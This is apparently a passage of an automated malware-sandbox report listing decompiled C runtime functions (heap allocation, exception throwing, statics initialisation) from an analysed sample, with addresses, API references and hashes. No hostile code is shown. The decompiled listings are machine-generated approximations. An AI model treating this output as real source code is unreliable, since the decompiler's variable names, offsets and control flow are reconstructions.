                                                                                                                                      0x0130a1c4
                                                                                                                                      0x0130a1c4
                                                                                                                                      0x0130a1ca
                                                                                                                                      0x0130a1cd
                                                                                                                                      0x0130a1a1
                                                                                                                                      0x0130a1a1
                                                                                                                                      0x0130a1a6
                                                                                                                                      0x00000000
                                                                                                                                      0x0130a1a8
                                                                                                                                      0x0130a1a8
                                                                                                                                      0x0130a1ad
                                                                                                                                      0x00000000
                                                                                                                                      0x0130a1af
                                                                                                                                      0x0130a1af
                                                                                                                                      0x0130a1b4
                                                                                                                                      0x00000000
                                                                                                                                      0x0130a1b6
                                                                                                                                      0x0130a1b6
                                                                                                                                      0x0130a1bb
                                                                                                                                      0x00000000
                                                                                                                                      0x0130a1bd
                                                                                                                                      0x0130a1bd
                                                                                                                                      0x0130a1c2
                                                                                                                                      0x00000000
                                                                                                                                      0x00000000
                                                                                                                                      0x00000000
                                                                                                                                      0x00000000
                                                                                                                                      0x0130a1c2
                                                                                                                                      0x0130a1bb
                                                                                                                                      0x0130a1b4
                                                                                                                                      0x0130a1ad
                                                                                                                                      0x0130a1a6
                                                                                                                                      0x0130a19f
                                                                                                                                      0x0130a1db
                                                                                                                                      0x0130a1df
                                                                                                                                      0x0130a1e2
                                                                                                                                      0x0130a1e5
                                                                                                                                      0x0130a219
                                                                                                                                      0x0130a1e7
                                                                                                                                      0x0130a1e9
                                                                                                                                      0x0130a1ec
                                                                                                                                      0x0130a1ed
                                                                                                                                      0x0130a1f2
                                                                                                                                      0x0130a1f5
                                                                                                                                      0x0130a1f7
                                                                                                                                      0x0130a1fa
                                                                                                                                      0x0130a1fd
                                                                                                                                      0x0130a200
                                                                                                                                      0x0130a203
                                                                                                                                      0x0130a206
                                                                                                                                      0x0130a20c
                                                                                                                                      0x0130a211
                                                                                                                                      0x0130a211
                                                                                                                                      0x0130a20c
                                                                                                                                      0x0130a21e
                                                                                                                                      0x0130a223
                                                                                                                                      0x0130a225
                                                                                                                                      0x0130a22c
                                                                                                                                      0x0130a236
                                                                                                                                      0x0130a23b
                                                                                                                                      0x0130a23d
                                                                                                                                      0x0130a242
                                                                                                                                      0x0130a246
                                                                                                                                      0x0130a249
                                                                                                                                      0x0130a24c
                                                                                                                                      0x0130a258
                                                                                                                                      0x0130a25b
                                                                                                                                      0x0130a25d
                                                                                                                                      0x0130a262
                                                                                                                                      0x0130a265
                                                                                                                                      0x0130a26f
                                                                                                                                      0x0130a274
                                                                                                                                      0x0130a277
                                                                                                                                      0x0130a279
                                                                                                                                      0x0130a279
                                                                                                                                      0x0130a27c
                                                                                                                                      0x0130a286
                                                                                                                                      0x0130a286
                                                                                                                                      0x0130a277
                                                                                                                                      0x0130a25b
                                                                                                                                      0x0130a242
                                                                                                                                      0x0130a23b
                                                                                                                                      0x0130a223
                                                                                                                                      0x0130a28b
                                                                                                                                      0x0130a28f
                                                                                                                                      0x00000000
                                                                                                                                      0x00000000
                                                                                                                                      0x00000000
                                                                                                                                      0x00000000
                                                                                                                                      0x01309977

                                                                                                                                      APIs
                                                                                                                                      • __CxxThrowException@8.LIBVCRUNTIME ref: 0130A0D6
                                                                                                                                        • Part of subcall function 0130C79F: RaiseException.KERNEL32(?,?,013096AC,00000000,?,?,?,?,?,?,?,013096AC,00000000,0132BBF8,?), ref: 0130C7FF
                                                                                                                                      • __CxxThrowException@8.LIBVCRUNTIME ref: 0130A0F3
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000002.00000002.505409012.0000000001301000.00000020.00000001.01000000.00000005.sdmp, Offset: 01300000, based on PE: true
                                                                                                                                      • Associated: 00000002.00000002.505385438.0000000001300000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.505578317.0000000001324000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.505631265.000000000132E000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.505681175.0000000001330000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_2_2_1300000_hjrypmyqervekvpteu.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID: Exception@8Throw$ExceptionRaise
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID: 3476068407-0
                                                                                                                                      • Opcode ID: a4f47faf2bcc3770bf4c4cdb41e0dc76f85e7905c16540d72e4e9c7d26293bb9
                                                                                                                                      • Instruction ID: 78278a27b0f675536bcc790e16d0134bb5f4b7272416bf67ee733e9f8efaee5c
                                                                                                                                      • Opcode Fuzzy Hash: a4f47faf2bcc3770bf4c4cdb41e0dc76f85e7905c16540d72e4e9c7d26293bb9
                                                                                                                                      • Instruction Fuzzy Hash: 4AF0B43480030FBACF16B6BDEC259AEB7EC4D1051CB508264EA68A24D5EF70D61982D0
                                                                                                                                      Uniqueness

                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                      C-Code - Quality: 92%
                                                                                                                                      			E01312C89(void* __ebx, void* __ecx) {
                                                                                                                                      				void* _t2;
                                                                                                                                      				intOrPtr _t3;
                                                                                                                                      				signed int _t15;
                                                                                                                                      				signed int _t16;
                                                                                                                                      
                                                                                                                                      				if( *0x132f008 == 0) {
                                                                                                                                      					_push(_t15);
                                                                                                                                      					E01319586(__ecx); // executed
                                                                                                                                      					_t2 = E01319979(); // executed
                                                                                                                                      					_t19 = _t2;
                                                                                                                                      					if(_t2 != 0) {
                                                                                                                                      						_t3 = E01312D36(__ebx, _t19);
                                                                                                                                      						if(_t3 != 0) {
                                                                                                                                      							 *0x132f014 = _t3;
                                                                                                                                      							E01310EBB(0x132f008, _t3);
                                                                                                                                      							_t16 = 0;
                                                                                                                                      						} else {
                                                                                                                                      							_t16 = _t15 | 0xffffffff;
                                                                                                                                      						}
                                                                                                                                      						E01314615(0);
                                                                                                                                      					} else {
                                                                                                                                      						_t16 = _t15 | 0xffffffff;
                                                                                                                                      					}
                                                                                                                                      					E01314615(_t19);
                                                                                                                                      					return _t16;
                                                                                                                                      				} else {
                                                                                                                                      					return 0;
                                                                                                                                      				}
                                                                                                                                      			}







                                                                                                                                      0x01312c90
                                                                                                                                      0x01312c96
                                                                                                                                      0x01312c97
                                                                                                                                      0x01312c9c
                                                                                                                                      0x01312ca1
                                                                                                                                      0x01312ca5
                                                                                                                                      0x01312cad
                                                                                                                                      0x01312cb5
                                                                                                                                      0x01312cc2
                                                                                                                                      0x01312cc7
                                                                                                                                      0x01312ccc
                                                                                                                                      0x01312cb7
                                                                                                                                      0x01312cb7
                                                                                                                                      0x01312cb7
                                                                                                                                      0x01312cd0
                                                                                                                                      0x01312ca7
                                                                                                                                      0x01312ca7
                                                                                                                                      0x01312ca7
                                                                                                                                      0x01312cd7
                                                                                                                                      0x01312ce1
                                                                                                                                      0x01312c92
                                                                                                                                      0x01312c94
                                                                                                                                      0x01312c94

                                                                                                                                      APIs
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000002.00000002.505409012.0000000001301000.00000020.00000001.01000000.00000005.sdmp, Offset: 01300000, based on PE: true
                                                                                                                                      • Associated: 00000002.00000002.505385438.0000000001300000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.505578317.0000000001324000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.505631265.000000000132E000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.505681175.0000000001330000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_2_2_1300000_hjrypmyqervekvpteu.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID: _free
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID: 269201875-0
                                                                                                                                      • Opcode ID: da70578d9d1fbf188fb6acc5d3bece281a79db90723acf85c6ccf4e0a6713b5f
                                                                                                                                      • Instruction ID: f26c696dfafd2a389877c81e4e3adea1ac26e5c5bc2a1d38cac4251e1156b071
                                                                                                                                      • Opcode Fuzzy Hash: da70578d9d1fbf188fb6acc5d3bece281a79db90723acf85c6ccf4e0a6713b5f
                                                                                                                                      • Instruction Fuzzy Hash: 63E0E53250251255DB3E36BF7C04B6B055D6BD277CF210219E224962CCDF24448282A5
                                                                                                                                      Uniqueness

                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                      C-Code - Quality: 71%
                                                                                                                                      			E013096DA(void* __ebx, void* __edx, void* __edi, void* __esi, void* __eflags) {
                                                                                                                                      				signed int _v0;
                                                                                                                                      				void* _t3;
                                                                                                                                      				signed int _t8;
                                                                                                                                      
                                                                                                                                      				E0130971E(__ebx, __edx, __edi, __esi); // executed
                                                                                                                                      				_t3 = E01309A46(__ebx, __edx, 0);
                                                                                                                                      				_t24 = _t3;
                                                                                                                                      				if(_t3 == 0) {
                                                                                                                                      					E01309E90(__edx, __edi, __esi, 7);
                                                                                                                                      					asm("int3");
                                                                                                                                      					_push(0x20);
                                                                                                                                      					asm("ror eax, cl");
                                                                                                                                      					_t8 = _v0 ^  *0x132e00c;
                                                                                                                                      					__eflags = _t8;
                                                                                                                                      					return _t8;
                                                                                                                                      				} else {
                                                                                                                                      					E01309BFF(_t24, 0x130980d);
                                                                                                                                      					return 0;
                                                                                                                                      				}
                                                                                                                                      			}






                                                                                                                                      0x013096da
                                                                                                                                      0x013096e1
                                                                                                                                      0x013096e7
                                                                                                                                      0x013096e9
                                                                                                                                      0x013096fb
                                                                                                                                      0x01309700
                                                                                                                                      0x0130970c
                                                                                                                                      0x01309714
                                                                                                                                      0x01309716
                                                                                                                                      0x01309716
                                                                                                                                      0x0130971d
                                                                                                                                      0x013096eb
                                                                                                                                      0x013096f0
                                                                                                                                      0x013096f8
                                                                                                                                      0x013096f8

                                                                                                                                      APIs
                                                                                                                                      • __scrt_initialize_thread_safe_statics_platform_specific.LIBCMT ref: 013096DA
                                                                                                                                        • Part of subcall function 0130971E: InitializeCriticalSectionAndSpinCount.KERNEL32(0132EAA8,00000FA0,17120AF4,?,?,?,?,0132391F,000000FF), ref: 0130974D
                                                                                                                                        • Part of subcall function 0130971E: GetModuleHandleW.KERNELBASE(api-ms-win-core-synch-l1-2-0.dll,?,?,?,?,0132391F,000000FF), ref: 01309758
                                                                                                                                        • Part of subcall function 0130971E: GetModuleHandleW.KERNEL32(kernel32.dll,?,?,?,?,0132391F,000000FF), ref: 01309769
                                                                                                                                        • Part of subcall function 0130971E: GetProcAddress.KERNEL32(00000000,InitializeConditionVariable), ref: 0130977F
                                                                                                                                        • Part of subcall function 0130971E: GetProcAddress.KERNEL32(00000000,SleepConditionVariableCS), ref: 0130978D
                                                                                                                                        • Part of subcall function 0130971E: GetProcAddress.KERNEL32(00000000,WakeAllConditionVariable), ref: 0130979B
                                                                                                                                        • Part of subcall function 0130971E: __crt_fast_encode_pointer.LIBVCRUNTIME ref: 013097C6
                                                                                                                                        • Part of subcall function 0130971E: __crt_fast_encode_pointer.LIBVCRUNTIME ref: 013097D1
                                                                                                                                      • ___scrt_fastfail.LIBCMT ref: 013096FB
                                                                                                                                        • Part of subcall function 01309BFF: __onexit.LIBCMT ref: 01309C05
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000002.00000002.505409012.0000000001301000.00000020.00000001.01000000.00000005.sdmp, Offset: 01300000, based on PE: true
                                                                                                                                      • Associated: 00000002.00000002.505385438.0000000001300000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.505578317.0000000001324000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.505631265.000000000132E000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.505681175.0000000001330000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_2_2_1300000_hjrypmyqervekvpteu.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID: AddressProc$HandleModule__crt_fast_encode_pointer$CountCriticalInitializeSectionSpin___scrt_fastfail__onexit__scrt_initialize_thread_safe_statics_platform_specific
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID: 66158676-0
                                                                                                                                      • Opcode ID: 47116151219b117abb510569f372c176e3cecd5af324c3add09ba517ddd6af50
                                                                                                                                      • Instruction ID: 792b8a85a040703355d60dc619c9bb8539f6f2f0f30593391d3812e7a9dbc83c
                                                                                                                                      • Opcode Fuzzy Hash: 47116151219b117abb510569f372c176e3cecd5af324c3add09ba517ddd6af50
                                                                                                                                      • Instruction Fuzzy Hash: D4C09B1624870752E85B76FD5CB1B5807C30F6193FF604445E65C5D6C7CD8044409315
                                                                                                                                      Uniqueness

                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                      C-Code - Quality: 91%
                                                                                                                                      			E0131A5A6(void* __esi, void* __eflags) {
                                                                                                                                      				intOrPtr _v12;
                                                                                                                                      				void* __ecx;
                                                                                                                                      				char _t16;
                                                                                                                                      				void* _t17;
                                                                                                                                      				void* _t26;
                                                                                                                                      				void* _t28;
                                                                                                                                      				void* _t30;
                                                                                                                                      				char _t31;
                                                                                                                                      				void* _t33;
                                                                                                                                      				intOrPtr* _t35;
                                                                                                                                      
                                                                                                                                      				_push(_t26);
                                                                                                                                      				_push(_t26);
                                                                                                                                      				_t16 = E013145B8(_t26, 0x40, 0x30); // executed
                                                                                                                                      				_t31 = _t16;
                                                                                                                                      				_v12 = _t31;
                                                                                                                                      				_t28 = _t30;
                                                                                                                                      				if(_t31 != 0) {
                                                                                                                                      					_t2 = _t31 + 0xc00; // 0xc00
                                                                                                                                      					_t17 = _t2;
                                                                                                                                      					__eflags = _t31 - _t17;
                                                                                                                                      					if(__eflags != 0) {
                                                                                                                                      						_t3 = _t31 + 0x20; // 0x20
                                                                                                                                      						_t35 = _t3;
                                                                                                                                      						_t33 = _t17;
                                                                                                                                      						do {
                                                                                                                                      							_t4 = _t35 - 0x20; // 0x0
                                                                                                                                      							E01314AE5(_t28, _t35, __eflags, _t4, 0xfa0, 0);
                                                                                                                                      							 *(_t35 - 8) =  *(_t35 - 8) | 0xffffffff;
                                                                                                                                      							 *_t35 = 0;
                                                                                                                                      							_t35 = _t35 + 0x30;
                                                                                                                                      							 *((intOrPtr*)(_t35 - 0x2c)) = 0;
                                                                                                                                      							 *((intOrPtr*)(_t35 - 0x28)) = 0xa0a0000;
                                                                                                                                      							 *((char*)(_t35 - 0x24)) = 0xa;
                                                                                                                                      							 *(_t35 - 0x23) =  *(_t35 - 0x23) & 0x000000f8;
                                                                                                                                      							 *((char*)(_t35 - 0x22)) = 0;
                                                                                                                                      							__eflags = _t35 - 0x20 - _t33;
                                                                                                                                      						} while (__eflags != 0);
                                                                                                                                      						_t31 = _v12;
                                                                                                                                      					}
                                                                                                                                      				} else {
                                                                                                                                      					_t31 = 0;
                                                                                                                                      				}
                                                                                                                                      				E01314615(0);
                                                                                                                                      				return _t31;
                                                                                                                                      			}













                                                                                                                                      0x0131a5ab
                                                                                                                                      0x0131a5ac
                                                                                                                                      0x0131a5b3
                                                                                                                                      0x0131a5b8
                                                                                                                                      0x0131a5bc
                                                                                                                                      0x0131a5c0
                                                                                                                                      0x0131a5c3
                                                                                                                                      0x0131a5c9
                                                                                                                                      0x0131a5c9
                                                                                                                                      0x0131a5cf
                                                                                                                                      0x0131a5d1
                                                                                                                                      0x0131a5d4
                                                                                                                                      0x0131a5d4
                                                                                                                                      0x0131a5d7
                                                                                                                                      0x0131a5d9
                                                                                                                                      0x0131a5df
                                                                                                                                      0x0131a5e3
                                                                                                                                      0x0131a5e8
                                                                                                                                      0x0131a5ec
                                                                                                                                      0x0131a5ee
                                                                                                                                      0x0131a5f1
                                                                                                                                      0x0131a5f7
                                                                                                                                      0x0131a5fe
                                                                                                                                      0x0131a602
                                                                                                                                      0x0131a606
                                                                                                                                      0x0131a609
                                                                                                                                      0x0131a609
                                                                                                                                      0x0131a60d
                                                                                                                                      0x0131a610
                                                                                                                                      0x0131a5c5
                                                                                                                                      0x0131a5c5
                                                                                                                                      0x0131a5c5
                                                                                                                                      0x0131a612
                                                                                                                                      0x0131a61f

                                                                                                                                      APIs
                                                                                                                                        • Part of subcall function 013145B8: RtlAllocateHeap.NTDLL(00000008,?,00000000,?,013144C4,00000001,00000364,?,0130C747,00000002,00000000,?,?,?,013095B7,0130969E), ref: 013145F9
                                                                                                                                      • _free.LIBCMT ref: 0131A612
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000002.00000002.505409012.0000000001301000.00000020.00000001.01000000.00000005.sdmp, Offset: 01300000, based on PE: true
                                                                                                                                      • Associated: 00000002.00000002.505385438.0000000001300000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.505578317.0000000001324000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.505631265.000000000132E000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.505681175.0000000001330000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_2_2_1300000_hjrypmyqervekvpteu.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID: AllocateHeap_free
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID: 614378929-0
                                                                                                                                      • Opcode ID: 47fd98734893acb0fb1057cce00143a533b7772076b51800a5f6d86841f8ecb2
                                                                                                                                      • Instruction ID: ed05a87f737c723ff1e05a2955056cb4cb2ff047eb1041a0882760be01a5ea4c
                                                                                                                                      • Opcode Fuzzy Hash: 47fd98734893acb0fb1057cce00143a533b7772076b51800a5f6d86841f8ecb2
                                                                                                                                      • Instruction Fuzzy Hash: C701F972204349EBE7258F69DC8195AFBEDEBC5374F25091DE5D493284EB30A805C774
                                                                                                                                      Uniqueness

                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                      C-Code - Quality: 95%
                                                                                                                                      			E013145B8(void* __ecx, signed int _a4, signed int _a8) {
                                                                                                                                      				void* __esi;
                                                                                                                                      				void* _t8;
                                                                                                                                      				void* _t12;
                                                                                                                                      				signed int _t13;
                                                                                                                                      				void* _t15;
                                                                                                                                      				void* _t16;
                                                                                                                                      				void* _t19;
                                                                                                                                      				signed int _t20;
                                                                                                                                      				long _t21;
                                                                                                                                      
                                                                                                                                      				_t16 = __ecx;
                                                                                                                                      				_t20 = _a4;
                                                                                                                                      				if(_t20 == 0) {
                                                                                                                                      					L2:
                                                                                                                                      					_t21 = _t20 * _a8;
                                                                                                                                      					if(_t21 == 0) {
                                                                                                                                      						_t21 = _t21 + 1;
                                                                                                                                      					}
                                                                                                                                      					while(1) {
                                                                                                                                      						_t8 = RtlAllocateHeap( *0x132f578, 8, _t21); // executed
                                                                                                                                      						if(_t8 != 0) {
                                                                                                                                      							break;
                                                                                                                                      						}
                                                                                                                                      						__eflags = E0131396D();
                                                                                                                                      						if(__eflags == 0) {
                                                                                                                                      							L8:
                                                                                                                                      							 *((intOrPtr*)(E01313CD1())) = 0xc;
                                                                                                                                      							__eflags = 0;
                                                                                                                                      							return 0;
                                                                                                                                      						}
                                                                                                                                      						_t12 = E0131245E(_t15, _t16, _t19, _t21, __eflags, _t21);
                                                                                                                                      						_pop(_t16);
                                                                                                                                      						__eflags = _t12;
                                                                                                                                      						if(_t12 == 0) {
                                                                                                                                      							goto L8;
                                                                                                                                      						}
                                                                                                                                      					}
                                                                                                                                      					return _t8;
                                                                                                                                      				}
                                                                                                                                      				_t13 = 0xffffffe0;
                                                                                                                                      				if(_t13 / _t20 < _a8) {
                                                                                                                                      					goto L8;
                                                                                                                                      				}
                                                                                                                                      				goto L2;
                                                                                                                                      			}












                                                                                                                                      0x013145b8
                                                                                                                                      0x013145be
                                                                                                                                      0x013145c3
                                                                                                                                      0x013145d1
                                                                                                                                      0x013145d1
                                                                                                                                      0x013145d7
                                                                                                                                      0x013145d9
                                                                                                                                      0x013145d9
                                                                                                                                      0x013145f0
                                                                                                                                      0x013145f9
                                                                                                                                      0x01314601
                                                                                                                                      0x00000000
                                                                                                                                      0x00000000
                                                                                                                                      0x013145e1
                                                                                                                                      0x013145e3
                                                                                                                                      0x01314605
                                                                                                                                      0x0131460a
                                                                                                                                      0x01314610
                                                                                                                                      0x00000000
                                                                                                                                      0x01314610
                                                                                                                                      0x013145e6
                                                                                                                                      0x013145eb
                                                                                                                                      0x013145ec
                                                                                                                                      0x013145ee
                                                                                                                                      0x00000000
                                                                                                                                      0x00000000
                                                                                                                                      0x013145ee
                                                                                                                                      0x00000000
                                                                                                                                      0x013145f0
                                                                                                                                      0x013145c9
                                                                                                                                      0x013145cf
                                                                                                                                      0x00000000
                                                                                                                                      0x00000000
                                                                                                                                      0x00000000

                                                                                                                                      APIs
                                                                                                                                      • RtlAllocateHeap.NTDLL(00000008,?,00000000,?,013144C4,00000001,00000364,?,0130C747,00000002,00000000,?,?,?,013095B7,0130969E), ref: 013145F9
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000002.00000002.505409012.0000000001301000.00000020.00000001.01000000.00000005.sdmp, Offset: 01300000, based on PE: true
                                                                                                                                      • Associated: 00000002.00000002.505385438.0000000001300000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.505578317.0000000001324000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.505631265.000000000132E000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.505681175.0000000001330000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_2_2_1300000_hjrypmyqervekvpteu.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID: AllocateHeap
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID: 1279760036-0
                                                                                                                                      • Opcode ID: 658f506f11a7452d2d4d7937cc7d6d81976922e72d2eccefb33db58e668fcf3d
                                                                                                                                      • Instruction ID: fa62c29bfd33ee5f953786aa56a5524d7eee80cb1c9b2d860cb82f5ce920fe06
                                                                                                                                      • Opcode Fuzzy Hash: 658f506f11a7452d2d4d7937cc7d6d81976922e72d2eccefb33db58e668fcf3d
                                                                                                                                      • Instruction Fuzzy Hash: F0F0E931605225EBEB3D6E2A9C04B6B3B5CAF4077CB198011ED04A788CDF30D40186E0
                                                                                                                                      Uniqueness

                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                      C-Code - Quality: 94%
                                                                                                                                      			E013151CD(void* __ecx, long _a4) {
                                                                                                                                      				void* __esi;
                                                                                                                                      				void* _t4;
                                                                                                                                      				void* _t6;
                                                                                                                                      				void* _t7;
                                                                                                                                      				void* _t8;
                                                                                                                                      				void* _t9;
                                                                                                                                      				long _t10;
                                                                                                                                      
                                                                                                                                      				_t8 = __ecx;
                                                                                                                                      				_t10 = _a4;
                                                                                                                                      				if(_t10 > 0xffffffe0) {
                                                                                                                                      					L7:
                                                                                                                                      					 *((intOrPtr*)(E01313CD1())) = 0xc;
                                                                                                                                      					__eflags = 0;
                                                                                                                                      					return 0;
                                                                                                                                      				}
                                                                                                                                      				if(_t10 == 0) {
                                                                                                                                      					_t10 = _t10 + 1;
                                                                                                                                      				}
                                                                                                                                      				while(1) {
                                                                                                                                      					_t4 = RtlAllocateHeap( *0x132f578, 0, _t10); // executed
                                                                                                                                      					if(_t4 != 0) {
                                                                                                                                      						break;
                                                                                                                                      					}
                                                                                                                                      					__eflags = E0131396D();
                                                                                                                                      					if(__eflags == 0) {
                                                                                                                                      						goto L7;
                                                                                                                                      					}
                                                                                                                                      					_t6 = E0131245E(_t7, _t8, _t9, _t10, __eflags, _t10);
                                                                                                                                      					_pop(_t8);
                                                                                                                                      					__eflags = _t6;
                                                                                                                                      					if(_t6 == 0) {
                                                                                                                                      						goto L7;
                                                                                                                                      					}
                                                                                                                                      				}
                                                                                                                                      				return _t4;
                                                                                                                                      			}










                                                                                                                                      0x013151cd
                                                                                                                                      0x013151d3
                                                                                                                                      0x013151d9
                                                                                                                                      0x0131520b
                                                                                                                                      0x01315210
                                                                                                                                      0x01315216
                                                                                                                                      0x00000000
                                                                                                                                      0x01315216
                                                                                                                                      0x013151dd
                                                                                                                                      0x013151df
                                                                                                                                      0x013151df
                                                                                                                                      0x013151f6
                                                                                                                                      0x013151ff
                                                                                                                                      0x01315207
                                                                                                                                      0x00000000
                                                                                                                                      0x00000000
                                                                                                                                      0x013151e7
                                                                                                                                      0x013151e9
                                                                                                                                      0x00000000
                                                                                                                                      0x00000000
                                                                                                                                      0x013151ec
                                                                                                                                      0x013151f1
                                                                                                                                      0x013151f2
                                                                                                                                      0x013151f4
                                                                                                                                      0x00000000
                                                                                                                                      0x00000000
                                                                                                                                      0x013151f4
                                                                                                                                      0x00000000

                                                                                                                                      APIs
                                                                                                                                      • RtlAllocateHeap.NTDLL(00000000,0130969E,00000000,?,0130C747,00000002,00000000,?,?,?,013095B7,0130969E,00000004,00000000,00000000,00000000), ref: 013151FF
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000002.00000002.505409012.0000000001301000.00000020.00000001.01000000.00000005.sdmp, Offset: 01300000, based on PE: true
                                                                                                                                      • Associated: 00000002.00000002.505385438.0000000001300000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.505578317.0000000001324000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.505631265.000000000132E000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.505681175.0000000001330000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_2_2_1300000_hjrypmyqervekvpteu.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID: AllocateHeap
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID: 1279760036-0
                                                                                                                                      • Opcode ID: 42b7c2b962c09fad6eef597987b7fb88b088b8a2f71801a4deeeafb6bd9c8261
                                                                                                                                      • Instruction ID: 5d235552b99a147fd0fdcf7fa34bafeae6c52bc772e326a39d22e3004e459b6a
                                                                                                                                      • Opcode Fuzzy Hash: 42b7c2b962c09fad6eef597987b7fb88b088b8a2f71801a4deeeafb6bd9c8261
                                                                                                                                      • Instruction Fuzzy Hash: A9E0653324121556EA3A2B6D9C00B9B3A5CABD33B8F150521FD25A6488CA60D84282E1
                                                                                                                                      Uniqueness

                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                      C-Code - Quality: 88%
                                                                                                                                      			E01307630(intOrPtr __ecx, void* __edx, void* __eflags) {
                                                                                                                                      				void* _t15;
                                                                                                                                      				intOrPtr _t21;
                                                                                                                                      				intOrPtr _t34;
                                                                                                                                      				void* _t36;
                                                                                                                                      
                                                                                                                                      				_t30 = __edx;
                                                                                                                                      				_t21 = __ecx;
                                                                                                                                      				E01323174(E013237F8, __edx, __eflags);
                                                                                                                                      				_t1 = _t36 + 8; // 0xec810001
                                                                                                                                      				_t34 = _t21;
                                                                                                                                      				_t2 = _t36 - 0x28; // 0x1306b19
                                                                                                                                      				 *((intOrPtr*)(_t36 - 0x10)) = _t34;
                                                                                                                                      				E01302917(_t2, _t30,  *_t1);
                                                                                                                                      				_t4 = _t36 - 4;
                                                                                                                                      				 *_t4 =  *(_t36 - 4) & 0x00000000;
                                                                                                                                      				_t42 =  *_t4;
                                                                                                                                      				_t6 = _t36 - 0x28; // 0x1306b19
                                                                                                                                      				_t7 = _t36 - 0x40; // 0x1306b01
                                                                                                                                      				_t15 = E0130757A(_t7, _t6,  *_t4);
                                                                                                                                      				 *(_t36 - 4) = 1;
                                                                                                                                      				_push(E01302712(_t15,  *_t4));
                                                                                                                                      				E01307692(_t34, 0x30, _t42); // executed
                                                                                                                                      				_t9 = _t36 - 0x40; // 0x1306b01
                                                                                                                                      				E01302755(_t9, 0x30, _t42);
                                                                                                                                      				_t10 = _t36 - 0x28; // 0x1306b19
                                                                                                                                      				E013028AF(_t10, 0x30, _t42);
                                                                                                                                      				_t11 = _t36 - 0xc; // 0x89645e5f
                                                                                                                                      				 *[fs:0x0] =  *_t11;
                                                                                                                                      				return _t34;
                                                                                                                                      			}







                                                                                                                                      0x01307630
                                                                                                                                      0x01307630
                                                                                                                                      0x01307635
                                                                                                                                      0x0130763e
                                                                                                                                      0x01307641
                                                                                                                                      0x01307643
                                                                                                                                      0x01307646
                                                                                                                                      0x01307649
                                                                                                                                      0x0130764e
                                                                                                                                      0x0130764e
                                                                                                                                      0x0130764e
                                                                                                                                      0x01307652
                                                                                                                                      0x01307655
                                                                                                                                      0x01307658
                                                                                                                                      0x0130765f
                                                                                                                                      0x01307668
                                                                                                                                      0x0130766d
                                                                                                                                      0x01307673
                                                                                                                                      0x01307676
                                                                                                                                      0x0130767b
                                                                                                                                      0x0130767e
                                                                                                                                      0x01307683
                                                                                                                                      0x01307688
                                                                                                                                      0x01307691

                                                                                                                                      APIs
                                                                                                                                      • __EH_prolog.LIBCMT ref: 01307635
                                                                                                                                        • Part of subcall function 01307692: __EH_prolog.LIBCMT ref: 01307697
                                                                                                                                      Memory Dump Source
